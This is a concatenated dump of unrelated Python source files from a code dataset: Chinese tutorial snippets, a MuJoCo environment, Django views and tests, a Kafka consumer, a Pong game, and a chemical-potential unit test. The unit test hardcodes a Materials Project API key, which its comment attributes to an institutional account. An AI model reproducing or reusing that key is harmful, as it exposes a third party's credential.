88\nfor val in f:\n print(val)\n\"\"\"\n\"\"\"\n定义生成器\n\n\n\ndef fib(n):\n a, b = 0, 1\n for _ in range(n):\n a, b = b, a + b\n yield a\n\n\ndef main():\n for val in fib(20):\n print(val)\n\n\nif __name__ == '__main__':\n main()\n\"\"\"\n\"\"\"\n元组\n\n# 元组中的元素是无法修改的,事实上我们在项目中尤其是多线程环境(后面会讲到)中可能更喜欢使用的是那些不变对象(一方面因为对象状态不能修改,\n# 所以可以避免由此引起的不必要的程序错误,简单的说就是一个不变的对象要比可变的对象更加容易维护;另一方面因为没有任何一个线程能够修改不变对\n# 象的内部状态,一个不变对象自动就是线程安全的,这样就可以省掉处理同步化的开销。一个不变对象可以方便的被共享访问)。所以结论就是:如果不需\n# 要对元素进行添加、删除、修改的时候,可以考虑使用元组,当然如果一个方法要返回多个值,使用元组也是不错的选择。\n# 元组在创建时间和占用的空间上面都优于列表。\n# 定义元组\nt = ('骆昊', 38, True, '四川成都')\nprint(t)\n# 获取元组中的元素\nprint(t[0])\nprint(t[3])\n# 遍历元组中的值\nfor member in t:\n print(member)\n# 重新给元组赋值\n# t[0] = '王大锤' # TypeError\n# 变量t重新引用了新的元组原来的元组将被垃圾回收\nt = ('王大锤', 20, True, '云南昆明')\nprint(t)\n# 将元组转换成列表\nperson = list(t)\nprint(person)\n# 列表是可以修改它的元素的\nperson[0] = '李小龙'\nperson[1] = 25\nprint(person)\n# 将列表转换成元组\nfruits_list = ['apple', 'banana', 'orange']\nfruits_tuple = tuple(fruits_list)\nprint(fruits_tuple)\n\"\"\"\n\"\"\"\n使用集合\nPython中的集合跟数学上的集合是一致的,不允许���重复元素,而且可以进行交集、并集、差集等运算。\n\n\n# 创建集合的字面量语法\nset1 = {1, 2, 3, 3, 3, 2}\nprint(set1) # {1, 2, 3},集合元素不重复\nprint('Length =', len(set1))\n# 创建集合的构造器语法(面向对象部分会进行详细讲解)\nset2 = set(range(1, 10))\nset3 = set((1, 2, 3, 3, 2, 1))\nprint(set2, set3)\n# 创建集合的推导式语法(推导式也可以用于推导集合)\nset4 = {num for num in range(1, 100) if num % 3 == 0 or num % 5 == 0}\nprint(set4)\n\nset1.add(4)\nset1.add(5)\nset2.update([11, 12])\nset2.discard(5) # 删除元素\nif 4 in set2:\n set2.remove(4)\nprint(set1, set2)\nprint(set3.pop()) # 取出第一个元素\nprint(set3)\n\nset1 = {1, 2, 3, 4, 5}\nset2 = {3, 4, 5, 6, 7}\n# 集合的交集、并集、差集、对称差运算\nprint(set1 & set2) # 交集\n# print(set1.intersection(set2))\nprint(set1 | set2) # 并集\n# print(set1.union(set2))\nprint(set1 - set2) # A-B\n# print(set1.difference(set2))\nprint(set1 ^ set2) # 并集-交集\n# print(set1.symmetric_difference(set2))\n# 判断子集和超集\nprint(set2 <= set1) # set2 是 set1 的子集\n# print(set2.issubset(set1))\nprint(set3 <= set1)\n# print(set3.issubset(set1))\nprint(set1 >= set2) # set2 是 set1 的子集\n# print(set1.issuperset(set2))\nprint(set1 >= set3)\n# print(set1.issuperset(set3))\n\"\"\"\n\"\"\"\n字典\n\n# 创建字典的字面量语法\nscores = {'骆昊': 95, '白元芳': 78, '狄仁杰': 82}\nprint(scores)\n# 创建字典的构造器语法\nitems1 = dict(one=1, two=2, three=3, four=4)\n# 通过zip函数将两个序列压成字典\nitems2 = dict(zip(['a', 'b', 'c'], '123'))\n# 创建字典的推导式语法\nitems3 = {num: num ** 2 for num in range(1, 10)} # ** : 幂\nprint(items1, items2, items3)\n# 通过键可以获取字典中对应的值\nprint(scores['骆昊'])\nprint(scores['狄仁杰'])\n# 对字典中所有键值对进行遍历\nfor key in scores:\n print(f'{key}: {scores[key]}')\n# 更新字典中的元素\nscores['白元芳'] = 65\nscores['诸葛王朗'] = 71\nscores.update(冷面=67, 方启鹤=85)\nprint(scores)\nif '武则天' in scores:\n print(scores['武则天'])\nprint(scores.get('武则天'))\n# get方法也是通过键获取对应的值但是可以设置默认值\nprint(scores.get('武则天', 60))\n# 删除字典中的元素\nprint(scores.popitem())\nprint(scores.popitem())\nprint(scores.pop('骆昊', 100))\n# 清空字典\nscores.clear()\nprint(scores)\n\"\"\"\n\"\"\"\n面向对象\n在实际开发中,我们并不建议将属性设置为私有的,因为这会导致子类无法访问(后面会讲到)。\n所以大多数Python程序员会遵循一种命名惯例就是让属性名以单下划线开头来表示属性是受保护\n的,本类之外的代码在访问这样的属性时应该要保持慎重。这种做法并不是语法上的规则,单下划\n线开头的属性和方法外界仍然是可以访问的,所以更多的时候它是一种暗示或隐喻\n\n\n\nclass Student(object):\n\n # __init__是一个特殊方法用于在创建对象时进行初始化操作\n # 通过这个方法我们可以为学生对象绑定name和age两个属性\n def __init__(self, name='jiang', age=21):\n self.name = name\n self.age = age\n\n def study(self, course_name):\n print('%s正在学习%s.' % (self.name, course_name))\n\n # PEP 8要求标识符的名字用全小写多个单词用下划线连接\n # 但是部分程序员和公司更倾向于使用驼峰命名法(驼峰标识)\n def watch_movie(self):\n if self.age < 18:\n print('%s只能观看《熊出没》.' % self.name)\n else:\n print('%s正在观看岛国爱情大电影.' % self.name)\n\n\ndef main():\n # 创建学生对象并指定姓名和年龄\n stu1 = Student('骆昊', 38)\n # 给对象发study消息\n stu1.study('Python程序设计')\n # 给对象发watch_av消息\n stu1.watch_movie()\n stu2 = Student('王大锤', 15)\n stu2.study('思想品德')\n stu2.watch_movie()\n stu3 = Student()\n stu3.watch_movie()\n\n\nif __name__ == '__main__':\n main()\n\"\"\"\n\"\"\"\n访问器和修改器\n\n\n\nclass Student(object):\n def __init__(self, name, identify_code):\n self._name = name\n self._identify_code = identify_code\n\n @property # 访问器\n def name(self):\n return self._name\n\n @property\n def identify(self):\n return self._identify_code\n\n @name.setter # 修改器\n def name(self, name):\n self._name = name\n\n\nstu1 = Student('jiang', 25)\nstu1.name = 'John'\nstu1.sex = 'male'\nprint(stu1.name)\nprint(stu1.identify)\nprint(stu1.sex)\n\"\"\"\n\"\"\"\n_slots_ 魔法\n\n\n\nclass Person(object):\n\n # 限定Person对象只能绑定_name, _age和_gender属性\n __slots__ = ('_name', '_age', '_gender')\n\n def __init__(self, name, age):\n self._name = name\n self._age = age\n\n @property\n def name(self):\n return self._name\n\n @property\n def age(self):\n return self._age\n\n @age.setter\n def age(self, age):\n self._age = age\n\n def play(self):\n if self._age <= 16:\n print('%s正在玩飞行棋.' % self._name)\n else:\n print('%s正在玩斗地主.' % self._name)\n\n\ndef main():\n person = Person('王大锤', 22)\n person.play()\n person._gender = '男'\n # AttributeError: 'Person' object has no attribute '_is_gay'\n # person._is_gay = True\n\"\"\"\n\"\"\"\n静态方法\n\nfrom math import sqrt\n\n\nclass Triangle(object):\n\n def __init__(self, a, b, c):\n self._a = a\n self._b = b\n self._c = c\n\n @staticmethod\n def is_valid(a, b, c):\n return a + b > c and b + c > a and a + c > b\n\n def perimeter(self):\n return self._a + self._b + self._c\n\n def area(self):\n half = self.perimeter() / 2\n return sqrt(half * (half - self._a) *\n (half - self._b) * (half - self._c))\n\n\ndef main():\n a, b, c = 3, 4, 5\n # 静态方法和类方法都是通过给类发消息来调用的\n if Triangle.is_valid(a, b, c):\n t = Triangle(a, b, c)\n print(t.perimeter())\n # 也可以通过给类发消息来调用对象方法但是要传入接收消息的对象作为参数\n # print(Triangle.perimeter(t))\n print(t.area())\n # print(Triangle.area(t))\n else:\n print('无法构成三角形.')\n\n\nif __name__ == '__main__':\n main()\n\"\"\"\n\"\"\"\n类方法\n\nfrom time import time, localtime, sleep\n\n\nclass Clock(object):\n\n def __init__(self, hour=0, minute=0, second=0):\n self._hour = hour\n self._minute = minute\n self._second = second\n\n @classmethod\n def now(cls):\n ctime = localtime(time())\n return cls(ctime.tm_hour, ctime.tm_min, ctime.tm_sec)\n\n def run(self):\n self._second += 1\n if self._second == 60:\n self._second = 0\n self._minute += 1\n if self._minute == 60:\n self._minute = 0\n self._hour += 1\n if self._hour == 24:\n self._hour = 0\n\n def show(self):\n return '%02d:%02d:%02d' % \\\n (self._hour, self._minute, self._second)\n\n\ndef main():\n # 通过类方法创建对象并获取系统时间\n clock = Clock.now()\n while True:\n print(clock.show())\n sleep(1)\n clock.run()\n\n\nif __name__ == '__main__':\n main() \n\"\"\"\n\"\"\"\nflag = not True\nmy_str = ''\nmy_str = 'hello' if flag else 'bye'\nprint(my_str)\n\"\"\"\nfrom time import time\n\n\ndef main():\n total = 0\n number_list = [x for x in range(1, 100000001)]\n start = time()\n for number in number_list:\n total += number\n print(total)\n end = time()\n print('Execution time: %.3fs' % (end - start))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"study/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":15643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"441728303","text":"from modular_mujoco_envs.modular_mujoco_env import ModularMujocoEnv\nimport numpy as np\n\n\nclass ModularHumanoid2dEnv(ModularMujocoEnv):\n \"\"\"Defines a custom base class for MuJoCo environments that provides \n a common interface for extracting morphology information from the agent, \n including the positions, orientations, and range of each limb.\n \n \"\"\"\n\n def __init__(self, xml, control_penalty=1e-3, alive_bonus=1.0,\n time_skip=5, include_joint_range_in_obs=True,\n include_position_in_obs=True, \n include_orientation_in_obs=True,\n include_position_vel_in_obs=True, \n include_orientation_vel_in_obs=True,\n one_joint_per_limb=True, hide_root_x_position=True):\n \"\"\"Instantiates a modular MuJoCo environment using a custom xml \n file defining the structure of the agent, and provides a clean \n interface to extracting the agent's morphology.\n\n Arguments:\n\n xml: str\n the path an xml file on the disk containing an agent with a \n unique morphology, such as a humanoid with only one leg.\n control_penalty: float\n penalize taking large actions by adding a term proportional \n to the negative l2 norm of the action to the reward.\n alive_bonus: float\n encourage the agent to stay alive and avoid falling by adding \n a positive constant to the reward at every step.\n time_skip: int\n the number of time steps to run the mujoco simulator for every\n step of the outer reinforcement learning environment.\n\n include_joint_range_in_obs: bool\n a boolean that specifies whether the observation of the robot\n includes a normalized description of the joint range.\n include_position_in_obs: bool\n a boolean that specifies whether the observation of the robot\n includes a normalized description of the body position.\n include_orientation_in_obs: bool\n a boolean that specifies whether the observation of the robot\n includes a normalized description of the body orientation.\n \n include_position_vel_in_obs: bool\n a boolean that specifies whether the observation of the robot\n includes a normalized description of the body velocity.\n include_orientation_vel_in_obs: bool\n a boolean that specifies whether the observation of the robot\n includes a normalized description of the body velocity.\n\n one_joint_per_limb: bool\n a boolean that controls whether each observation per limb \n includes only a single joint if multiple are available.\n hide_root_x_position: bool\n a boolean that controls whether the root x position of the\n agent is not included in the observation for the torso.\n\n \"\"\"\n\n # build the superclass using modified default arguments\n super(ModularHumanoid2dEnv, self).__init__(\n xml, control_penalty=control_penalty, \n alive_bonus=alive_bonus, time_skip=time_skip,\n include_joint_range_in_obs=include_joint_range_in_obs,\n include_position_in_obs=include_position_in_obs, \n include_orientation_in_obs=include_orientation_in_obs,\n include_position_vel_in_obs=include_position_vel_in_obs, \n include_orientation_vel_in_obs=include_orientation_vel_in_obs,\n one_joint_per_limb=one_joint_per_limb, \n hide_root_x_position=hide_root_x_position)\n\n def viewer_setup(self):\n \"\"\"Positions the camera in the scene in order to visualize the\n behavior acquired by neural network policies.\n\n \"\"\"\n\n self.viewer.cam.trackbodyid = 1\n self.viewer.cam.distance = self.model.stat.extent * 1.0\n self.viewer.cam.lookat[2] = 2.0\n self.viewer.cam.elevation = -20\n\n def has_finished(self, action):\n \"\"\"Determines whether the agent has fallen, or otherwise is unable\n to proceed in the environemnt, and returns True on such \n conditions, indicating the episode has finished.\n\n Arguments:\n\n action: np.ndarray\n a vector of actions for a modular mujoco agent, which\n should match the order of bodies in the xml file.\n\n Returns:\n\n done\n\n \"\"\"\n\n torso_height, torso_ang = self.sim.data.qpos[1:3]\n return not (torso_height > 0.4 and torso_height < 2.1 and\n torso_ang > -1.0 and torso_ang < 1.0)\n","sub_path":"modular_mujoco_envs/modular_humanoid2d_env.py","file_name":"modular_humanoid2d_env.py","file_ext":"py","file_size_in_byte":4605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"432341846","text":"from setuptools import setup\n\nwith open('README.rst', 'r') as infile:\n long_des = infile.read()\n\nsetup(\n name='pydogs',\n description='A Delaunay based approach of hyperparmeter optimization.',\n long_description=long_des,\n version='0.1.5',\n url='https://github.com/deltadogs/pyDOGS4',\n author='Shahrouz Ryan Alimo',\n author_email='salimoha@ucsd.edu',\n packages=['pydogs']\n)\n","sub_path":"pypi_install_script/pydogs-0.1.5.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"35056077","text":"# coding: utf-8\n\nfrom __future__ import division\n\n__status__ = \"Development\"\n\nimport copy\nimport inspect\nimport os\nimport unittest\nfrom shutil import copyfile\n\nfrom monty.serialization import loadfn\nfrom monty.tempfile import ScratchDir\nfrom pymatgen.analysis.defects.thermodynamics import DefectPhaseDiagram\nfrom pymatgen.analysis.phase_diagram import PhaseDiagram\nfrom pymatgen.core import Composition, Element\nfrom pymatgen.entries.computed_entries import ComputedEntry\nfrom pymatgen.ext.matproj import MPRester\nfrom pymatgen.util.testing import PymatgenTest\n\nfrom doped.pycdt.core._chemical_potentials import (\n ChemPotAnalyzer,\n MPChemPotAnalyzer,\n UserChemPotAnalyzer,\n UserChemPotInputGenerator,\n get_mp_chempots_from_dpd,\n)\n\nTEST_DIR = os.path.abspath(os.path.join(__file__, \"..\", \"..\", \"..\", \"test_files\"))\n\n\nclass UserChemPotAnalyzerTest(PymatgenTest):\n def setUp(self):\n with MPRester(api_key=\"c2LiJRMiBeaN5iXsH\") as mp:\n self.bulk_ce = mp.get_entry_by_material_id(\"mp-2534\")\n self.UCPA = UserChemPotAnalyzer(\n bulk_ce=self.bulk_ce, mapi_key=\"c2LiJRMiBeaN5iXsH\"\n )\n # SK MP Imperial email A/C API key\n self.UCPA_sub = UserChemPotAnalyzer(\n bulk_ce=self.bulk_ce, sub_species=[\"In\"], mapi_key=\"c2LiJRMiBeaN5iXsH\"\n )\n\n def test_read_phase_diagram_and_chempots(self):\n # set up a local phase diagram object...\n # test non mp case,\n with ScratchDir(\".\"):\n # os.mkdir('PhaseDiagram')\n os.makedirs(os.path.join(\"PhaseDiagram\", \"Ga\"))\n copyfile(\n os.path.join(TEST_DIR, \"vasprun.xml_Ga\"),\n os.path.join(\"PhaseDiagram\", \"Ga\", \"vasprun.xml\"),\n )\n os.mkdir(os.path.join(\"PhaseDiagram\", \"As\"))\n copyfile(\n os.path.join(TEST_DIR, \"vasprun.xml_As\"),\n os.path.join(\"PhaseDiagram\", \"As\", \"vasprun.xml\"),\n )\n os.mkdir(os.path.join(\"PhaseDiagram\", \"GaAs\"))\n copyfile(\n os.path.join(TEST_DIR, \"vasprun.xml_GaAs\"),\n os.path.join(\"PhaseDiagram\", \"GaAs\", \"vasprun.xml\"),\n )\n cp = self.UCPA.read_phase_diagram_and_chempots(\n full_sub_approach=False, include_mp_entries=False\n )\n self.assertEqual(set([\"As-GaAs\", \"Ga-GaAs\"]), set(cp[\"facets\"].keys()))\n self.assertEqual(\n [-5.36, -4.29],\n [\n round(cp[\"facets\"][\"As-GaAs\"][Element(elt)], 2)\n for elt in [\"As\", \"Ga\"]\n ],\n )\n self.assertEqual(\n [-6.04, -3.61],\n [\n round(cp[\"facets\"][\"Ga-GaAs\"][Element(elt)], 2)\n for elt in [\"As\", \"Ga\"]\n ],\n )\n\n # followed by an case where MP needs to supplement...\n with ScratchDir(\".\"):\n os.mkdir(\"PhaseDiagram\")\n # NO Ga entry included this time\n os.mkdir(os.path.join(\"PhaseDiagram\", \"As\"))\n copyfile(\n os.path.join(TEST_DIR, \"vasprun.xml_As\"),\n os.path.join(\"PhaseDiagram\", \"As\", \"vasprun.xml\"),\n )\n os.mkdir(os.path.join(\"PhaseDiagram\", \"GaAs\"))\n copyfile(\n os.path.join(TEST_DIR, \"vasprun.xml_GaAs\"),\n os.path.join(\"PhaseDiagram\", \"GaAs\", \"vasprun.xml\"),\n )\n cp = self.UCPA.read_phase_diagram_and_chempots(\n full_sub_approach=False, include_mp_entries=True\n )\n self.assertEqual(set([\"As-GaAs\", \"Ga-GaAs\"]), set(cp[\"facets\"].keys()))\n self.assertEqual(\n [-5.36, -4.29],\n [\n round(cp[\"facets\"][\"As-GaAs\"][Element(elt)], 2)\n for elt in [\"As\", \"Ga\"]\n ],\n )\n self.assertEqual(\n [-6.62, -3.03],\n [\n round(cp[\"facets\"][\"Ga-GaAs\"][Element(elt)], 2)\n for elt in [\"As\", \"Ga\"]\n ],\n )\n\n # quick and dirty test for finding extrinsic defects...\n with ScratchDir(\".\"):\n os.mkdir(\"PhaseDiagram\")\n # NO Ga entry or In entry this time\n os.mkdir(os.path.join(\"PhaseDiagram\", \"As\"))\n copyfile(\n os.path.join(TEST_DIR, \"vasprun.xml_As\"),\n os.path.join(\"PhaseDiagram\", \"As\", \"vasprun.xml\"),\n )\n os.mkdir(os.path.join(\"PhaseDiagram\", \"GaAs\"))\n copyfile(\n os.path.join(TEST_DIR, \"vasprun.xml_GaAs\"),\n os.path.join(\"PhaseDiagram\", \"GaAs\", \"vasprun.xml\"),\n )\n cp = self.UCPA_sub.read_phase_diagram_and_chempots(\n full_sub_approach=False, include_mp_entries=True)\n self.assertEqual({'As-GaAs-In', 'Ga-GaAs-In'}, set(cp[\"facets\"].keys()))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"doped/pycdt/core/tests/test_chemical_potentials.py","file_name":"test_chemical_potentials.py","file_ext":"py","file_size_in_byte":5030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"602930258","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport wave\n\nfrom django.http import Http404\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.urls import reverse\n\nfrom webapp.forms import WAVForm, WAVChangeForm\nfrom webapp.models import WAVFile\n\n\ndef wav_add_view(request):\n form = WAVForm(request.POST or None, request.FILES or None)\n if form.is_valid():\n obj = form.save()\n try:\n if wave.open(obj.file.path).getparams()[:3] != (1, 2, 8000):\n raise wave.Error()\n except (FileNotFoundError, wave.Error):\n obj.convert()\n\n return redirect(reverse('webapp:list'))\n return render(request, 'webapp/wav/add.html', {'form': form})\n\n\ndef wav_list_view(request):\n return render(request, 'webapp/wav/list.html', {'objects': WAVFile.objects.all()})\n\n\ndef wav_change_view(request, pk):\n obj = get_object_or_404(WAVFile, pk=pk)\n form = WAVChangeForm(instance=obj, data=request.POST or None)\n if form.is_valid():\n obj = form.save()\n try:\n if wave.open(obj.file.path).getparams()[:3] != (1, 2, 8000):\n raise wave.Error()\n except (FileNotFoundError, wave.Error):\n obj.convert()\n return redirect(reverse('webapp:list'))\n return render(request, 'webapp/wav/change.html', {'form': form})\n\n\ndef wav_delete_view(request, pk):\n if request.method == 'POST':\n obj = get_object_or_404(WAVFile, pk=pk)\n obj.delete()\n return redirect(reverse('webapp:list'))\n\n raise Http404()\n","sub_path":"fileloader/webapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"411199061","text":"\n\n#calss header\nclass _LOX():\n\tdef __init__(self,): \n\t\tself.name = \"LOX\"\n\t\tself.definitions = [u' salmon (= a type of fish) that has been preserved with smoke: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_lox.py","file_name":"_lox.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"201763374","text":"import logging\nfrom pykafka import KafkaClient\nfrom pykafka.simpleconsumer import OffsetType\n\nlogging.getLogger(\"pykafka.broker\").setLevel('ERROR')\n\nconsumer_client = KafkaClient(hosts=\"localhost:9092\")\n\ncons_topic = consumer_client.topics['demo']\n\ndata_consumer = cons_topic.get_balanced_consumer(\n consumer_group = b'pytkafka-demo-2',\n auto_commit_enable = False,\n auto_offset_reset = OffsetType.EARLIEST,\n zookeeper_connect = 'localhost:2181'\n)\n\nfor mes in data_consumer:\n if mes is not None:\n print(\"Message\",mes.offset, mes.value)","sub_path":"consumer_data.py","file_name":"consumer_data.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"653387934","text":"import pygame\r\nimport time\r\nimport random\r\n\r\npygame.init()\r\npygame.font.init()\r\nmyfont = pygame.font.SysFont('Comic Sans MS', 30)\r\nscreen = pygame.display.set_mode((1280,720))\r\ndone = False\r\n#set initial variables\r\np1_x,p1_y=30,30\r\np2_x,p2_y=(screen.get_width()-60),30\r\nball_x,ball_y=((screen.get_width())/2),((screen.get_height())/2)\r\nslope_x,slope_y=2,2\r\npaddle_score=0\r\n#set constants\r\npaddle_width = screen.get_width()/64\r\npaddle_height = screen.get_height()/3.6\r\n#define Paddle class\r\nclass Paddle:\r\n def __init__(self,x,y):\r\n self.x=x\r\n self.y=y\r\n self.player=pygame.draw.rect(screen, (255,255,255), pygame.Rect(self.x,self.y,paddle_width,paddle_height))\r\n self.rect=pygame.Rect(self.x,self.y,paddle_width,paddle_height)\r\n\r\n #macros\r\n self.paddle_speed=3\r\n\r\n def draw(self):\r\n self.player=pygame.draw.rect(screen, (255,255,255), pygame.Rect(self.x,self.y,paddle_width,paddle_height))\r\n self.rect=pygame.Rect(self.x,self.y,paddle_width,paddle_height)\r\n def up(self):\r\n if self.y>0:\r\n self.y-=self.paddle_speed\r\n def down(self):\r\n if self.y= (screen.get_height()):\r\n self.slope_y*=-1\r\n if self.x <= 0:\r\n self.slope_x*=-1\r\n self.ball_score+=1\r\n self.x,self.y=((screen.get_width())/2),((screen.get_height())/2)\r\n time.sleep(1)\r\n if self.x >= (screen.get_width()):\r\n self.slope_x*=-1\r\n self.ball_score+=1\r\n self.x,self.y=((screen.get_width())/2),((screen.get_height())/2)\r\n time.sleep(1)\r\n #collision\r\n self.rect = pygame.Rect(self.x,self.y,paddle_width,paddle_width)\r\n if self.rect.colliderect(p1.rect): \r\n self.col(p1) \r\n self.x=p1.x+paddle_width\r\n if self.rect.colliderect(p2.rect): \r\n self.col(p2)\r\n self.x=p2.x-paddle_width\r\n self.player=pygame.draw.rect(screen, (255,255,255), pygame.Rect(self.x,self.y,paddle_width,paddle_width))\r\n self.rect = pygame.Rect(self.x,self.y,paddle_width,paddle_width)\r\n\r\n def col(self,obj):\r\n\r\n if self.slope_x > 0: # Moving right; Hit the left side of the paddle\r\n self.rect.right = obj.rect.left\r\n if self.slope_x < 0: # Moving left; Hit the right side of the paddle\r\n self.rect.left = obj.rect.right\r\n self.paddle_score+=1\r\n self.slope_x*=-1\r\n if self.slope_y>0:\r\n self.slope_y=random.randint(1,3) * -1\r\n else:\r\n self.slope_y=random.randint(1,3)\r\n #self.x+=(self.slope_x*2)\r\n self.y+=self.slope_y\r\n def up(self):\r\n if self.y>0:\r\n self.y-=self.ball_speed\r\n def down(self):\r\n if self.yHello, humans\")\n self.template_snippet = Snippet.objects.create(key=\"django\",\n text=\"{{ dog|upper }}\")\n\n def test_has_snippet(self):\n \"\"\"Ensure that the saved snippet text is displayed\"\"\"\n t = Template(\"\"\"{% spaceless %}{% load addendum_tags %}{% snippet 'plain' %}Hello world{% endsnippet %}{% endspaceless %}\"\"\")\n c = Context({})\n result = t.render(c)\n self.assertEqual(result, \"Hello, humans\")\n\n def test_no_snippet(self):\n \"\"\"Ensure that the default text is displayed\"\"\"\n t = Template(\"\"\"{% spaceless %}{% load addendum_tags %}{% snippet 'missing' %}Hello world{% endsnippet %}{% endspaceless %}\"\"\")\n c = Context({})\n result = t.render(c)\n self.assertEqual(result, \"Hello world\")\n\n def test_plain_text(self):\n \"\"\"Ensure that content is not escaped\"\"\"\n t = Template(\"\"\"{% spaceless %}{% load addendum_tags %}{% snippet 'rich' %}Hello world{% endsnippet %}{% endspaceless %}\"\"\")\n c = Context({})\n result = t.render(c)\n self.assertEqual(result, \"<h1>Hello, humans</h1>\")\n\n def test_richtext(self):\n \"\"\"Ensure that with richtext argument content is escaped\"\"\"\n t = Template(\"\"\"{% spaceless %}{% load addendum_tags %}{% snippet 'rich' richtext=True %}Hello world{% endsnippet %}{% endspaceless %}\"\"\")\n c = Context({})\n result = t.render(c)\n self.assertEqual(result, \"

Hello, humans

\")\n\n def test_raw_template_text(self):\n \"\"\"Ensure template code is not compiled by default\"\"\"\n t = Template(\"\"\"{% spaceless %}{% load addendum_tags %}{% snippet 'django' %}Hello world{% endsnippet %}{% endspaceless %}\"\"\")\n c = Context({'dog': 'woof'})\n result = t.render(c)\n self.assertEqual(result, \"{{ dog|upper }}\")\n\n def test_template_text(self):\n \"\"\"Ensure template code is rendered with the template option\"\"\"\n t = Template(\"\"\"{% spaceless %}{% load addendum_tags %}{% snippet 'django' template=True %}Hello world{% endsnippet %}{% endspaceless %}\"\"\")\n c = Context({'dog': 'woof'})\n result = t.render(c)\n self.assertEqual(result, \"WOOF\")\n\n def test_safe_template_text(self):\n t = Template(\"\"\"{% spaceless %}{% load addendum_tags %}{% snippet 'django' template=True %}Hello world{% endsnippet %}{% endspaceless %}\"\"\")\n c = Context({'dog': '

woof

'})\n result = t.render(c)\n self.assertEqual(result, \"<H1>WOOF</H1>\")\n\n t = Template(\"\"\"{% spaceless %}{% load addendum_tags %}{% snippet 'django' template=True safe=True %}Hello world{% endsnippet %}{% endspaceless %}\"\"\")\n c = Context({'dog': '

woof

'})\n result = t.render(c)\n self.assertEqual(result, \"

WOOF

\")\n\n def test_variable_key_name(self):\n \"\"\"Ensure a variable can be passed for the snippet key\"\"\"\n t = Template(\"\"\"{% spaceless %}{% load addendum_tags %}{% snippet snippetname %}Hello world{% endsnippet %}{% endspaceless %}\"\"\")\n c = Context({'snippetname': 'plain'})\n result = t.render(c)\n self.assertEqual(result, \"Hello, humans\")\n\n\nclass MakeSnippetsTests(TestCase):\n \"\"\"\n Tests that the makesnippets command creates missing snippets from templates\n \"\"\"\n\n def test_is_addendum_positive_check(self):\n \"\"\"\n A valid load addendum_tags tag should be\n considered as addendum template_string\n \"\"\"\n template_string = \"\"\"{% load addendum_tags %}\"\"\"\n check = is_addendum(template_string)\n self.assertTrue(check)\n\n def test_is_addendum_negative_check(self):\n \"\"\"\n An invalid load addendum_tags tag shouldn't\n be considered as addendum template\n \"\"\"\n template_string = \"\"\"load addendum_tags\"\"\"\n check = is_addendum(template_string)\n self.assertFalse(check)\n\n def test_search_snippets_nodes(self):\n \"\"\"\n Ensure that given a valid django template string,\n compiles it and extracts all SnippetNode nodes\n \"\"\"\n template_string = \"\"\"{% spaceless %}{% load addendum_tags %}{% snippet 'django' template=True safe=True %}Hello world{% endsnippet %}{% endspaceless %}\"\"\"\n nodes = search_snippet_nodes(template_string)\n self.assertEqual(len(nodes), 1)\n\n def test_search_empty_snippets_nodes(self):\n \"\"\"\n Ensure that given a valid django template string,\n without any SnippetNodes, it doesn't extracts any node\n \"\"\"\n template_string = \"\"\"{% load addendum_tags %}\"\"\"\n nodes = search_snippet_nodes(template_string)\n self.assertEqual(len(nodes), 0)\n\n def test_parse_snippets(self):\n \"\"\"\n Command.parse_snippets should populate the\n Command.found list collected snippet data\n \"\"\"\n c = Command()\n assert len(c.found) == 0\n\n t = Template(\"\"\"{% spaceless %}{% load addendum_tags %}{% snippet 'snippetname' %}Hello world{% endsnippet %}{% endspaceless %}\"\"\")\n snippet_nodes = t.nodelist.get_nodes_by_type(SnippetNode)\n c.parse_snippets(snippet_nodes)\n\n self.assertEqual(len(c.found), 1)\n self.assertEqual(c.found[0], {'name': 'snippetname', 'content': 'Hello world'})\n\n def test_handle_new_results(self):\n \"\"\"Command.handle_results should save new snippets\"\"\"\n assert len(Snippet.objects.all()) == 0\n\n c = Command()\n c.found = [{'name': 'snippetname', 'content': 'Hello world'}]\n\n c.handle_results()\n\n snippets = Snippet.objects.all()\n self.assertEqual(len(snippets), 1)\n self.assertEqual(snippets[0].key, 'snippetname')\n self.assertEqual(snippets[0].text, 'Hello world')\n\n def test_handle_existing_results(self):\n \"\"\"Command.handle_results should not save existing snippets\"\"\"\n assert len(Snippet.objects.all()) == 0\n Snippet.objects.create(key='snippetname', text='Hello World')\n\n c = Command()\n c.found = [{'name': 'snippetname', 'content': 'Hello world altered'}]\n\n c.handle_results()\n\n snippets = Snippet.objects.all()\n self.assertEqual(len(snippets), 1)\n self.assertEqual(snippets[0].key, 'snippetname')\n self.assertEqual(snippets[0].text, 'Hello World')\n","sub_path":"addendum/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":6879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"161926899","text":"import re\nimport requests\nimport json\n\nheaders1 = {\n\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0'\n}\n\n\ndef main(url):\n headers = {\n 'Host': 'pan.baidu.com',\n 'Origin': 'https://pan.baidu.com',\n 'Referer': url,\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like 